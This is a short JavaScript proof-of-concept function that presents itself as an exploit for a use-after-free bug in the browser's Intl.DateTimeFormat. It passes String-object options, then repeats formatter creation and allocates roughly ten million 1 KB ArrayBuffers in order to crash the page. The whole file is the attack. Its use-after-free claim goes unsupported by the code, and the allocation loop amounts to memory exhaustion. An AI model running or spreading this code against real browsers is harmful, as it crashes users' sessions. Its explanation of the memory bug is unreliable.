function triggerCrash() {
    try {
        const maliciousOptions = {
            hour: new String('2-digit'),
            minute: new String('2-digit'),
            second: new String('2-digit'),
            timeZone: 'UTC',
            hour12: false
        };

        const dtf = new Intl.DateTimeFormat('en-US', maliciousOptions);

        // Trigger use-after-free
        dtf.format(0);

        // Attempt to access freed memory aggressively
        for (let i = 0; i < 100000; i++) {
            // Creating new Intl.DateTimeFormat with same malicious options repeatedly
            new Intl.DateTimeFormat('en-US', maliciousOptions).format(0);
        }

        // Force garbage collection patterns (not directly callable in most browsers)
        let arr = [];
        for (let i = 0; i < 1e7; i++) arr.push(new ArrayBuffer(1024));

        // This line will likely never be reached if vulnerable
        document.getElementById('result').innerText =
            'Exploit executed but no crash detected.';
    } catch (e) {
        document.getElementById('result').innerText = 'Crash or exception: ' + e.message;
    }
}